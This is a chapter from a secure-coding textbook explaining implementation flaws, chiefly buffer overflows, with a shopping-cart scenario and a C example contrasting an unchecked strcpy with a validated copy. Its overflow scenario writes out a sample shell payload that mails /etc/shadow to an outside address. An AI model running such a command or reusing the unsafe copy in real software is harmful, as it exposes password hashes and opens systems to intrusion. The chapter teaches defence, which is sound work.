Chapter 4. Implementation
An implementation flaw is a mistake made while writing the software; most, though not all, implementation flaws are coding flaws per se. In our view, implementation flaws typically arise because the programmer is either unfamiliar with secure coding techniques or unwilling to take the trouble to apply them. (No doubt because we like to believe the best in human nature, we think it's much rarer that someone tries hard and still fails to write secure code.)

Looking back to the example of the SYN flood attacks, there were certainly implementation flaws in addition to the principal design flaw that led to the attacks. For example, when the array of TCP sockets became exhausted, some operating systems at the time simply crashed. This was the result of a memory overflow that occurred when the software attempted to store a value beyond the bounds of the array. At the very least, a carefully implemented TCP stack could have prevented such catastrophic failure of the operating systems.

Source code is the final stage in the translation of a design into something users can use, prior to the software's being subjected to testing and (eventually) production. Flaws in source code, therefore, have a direct link to the user base; because the machine translation of the source code is exactly what gets executed by the computer at production time, there is no margin for error. Even a superbly designed program or module can be rendered insecure by a programmer who makes a mistake during this last crucial step.

Consider a simple example of a programming error in a web-based shopping cart. Imagine that an otherwise flawlessly designed and implemented program inverts a Euro-to-dollar currency conversion algorithm, so that a person paying with Euros ends up getting a 20% discount on goods purchased. Needless to say, when the first European makes a purchase and reviews the bill, a flood of gleeful purchases from Europe will ensue.
This trivialized example points out how a human mistake in the programming process—an implementation flaw—can result in serious business problems for the person or company running the flawed software. Now, let's put this into the context of a security issue.

The classic example of an implementation security flaw is the buffer overflow. We discuss such flaws later in this chapter (see the sidebar Buffer Overflows), but for now, we simply provide a quick overview and look at how buffer-overflow flaws can be introduced into a software product. A buffer overflow occurs when a program accepts more input than it has allocated space for. In the types of cases that make the news, a serious vulnerability results when the program receives unchecked input data from a user (or some other data input source). The results can range from the program's crashing (usually ungracefully) to an attacker's being able to execute an arbitrary program or command on the victim's computer, often resulting in the attacker's attaining privileged access there.

Thinking back to our shopping cart and Euro-to-dollar conversion example, let's consider how a buffer-overflow situation might play out in the same software. In addition to the monetary conversion flaw, suppose the developers who wrote this software neglected to adequately screen user input data. In this hypothetical example, the developer assumed that the maximum quantity of any single item purchased in the shopping cart would be 999—that is, 3 digits—and so the code allocates space for only 3 digits of input data. However, a malicious-minded user looking at the site decides to see what will happen if he enters, say, a quantity that is 1025 digits long. If the application doesn't properly screen this input and instead passes it to the back-end database, it is possible that either the middleware software (perhaps PHP or some other common middleware language) or the back-end database running the application will crash.
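A minimal C sketch of the quantity-handling flaw might look like the following; the function names and buffer sizes are hypothetical, chosen only to mirror the 3-digit assumption above.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical sketch of the flaw described above: the developer allocates
 * room for a 3-digit quantity (plus a terminating NUL) and copies user
 * input into it without checking the input's length. */
void read_quantity_unsafe(const char *user_input) {
    char qty[4];                 /* room for "999" plus '\0' */
    strcpy(qty, user_input);     /* overflows if input exceeds 3 characters */
    printf("quantity: %s\n", qty);
}

/* A bounds-checked version: refuse anything that is empty, too long,
 * or not purely numeric. Returns 0 on success, -1 on rejection. */
int read_quantity_safe(const char *user_input, char *qty, size_t qty_size) {
    size_t len = strlen(user_input);
    if (len == 0 || len >= qty_size)
        return -1;                       /* too long or empty: reject */
    for (size_t i = 0; i < len; i++)
        if (user_input[i] < '0' || user_input[i] > '9')
            return -1;                   /* non-digit character: reject */
    memcpy(qty, user_input, len + 1);    /* length verified: copy is safe */
    return 0;
}
```

The safe version embodies the screening the hypothetical developers skipped: it checks the input's length against the buffer's actual size and validates that the content is what the program expects before any copy takes place.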
Take this scenario one step further now. Our attacker has a copy of the software running in his own environment and he analyzes it quite carefully. In looking over the application code, he discovers that the buffer-overflow situation actually results in a portion of the user input field spilling into the CPU's stack and, under certain circumstances, being executed. If the attacker carefully generates an input stream that includes some chosen text—for example, #!/bin/sh Mail [email protected] < /etc/shadow—then it's possible that the command could get run on the web server computer. Not likely, you say? That's exactly how Robert T. Morris's Internet worm duped the Berkeley Unix finger daemon into running a command and copying itself to each new victim computer back in early November of 1988.
In the remainder of this chapter, we discuss ways to fight buffer overflows and other types of implementation flaws. The good news for you is that, although implementation flaws can have major adverse consequences, they are generally far easier than design flaws both to detect and to remedy. Various tools—both commercial and open source—simplify the process of testing software code for the most common flaws (including buffer overflows) before the software is deployed into production environments. The following sections list the implementation practices we recommend you use, as well as those we advise you to avoid.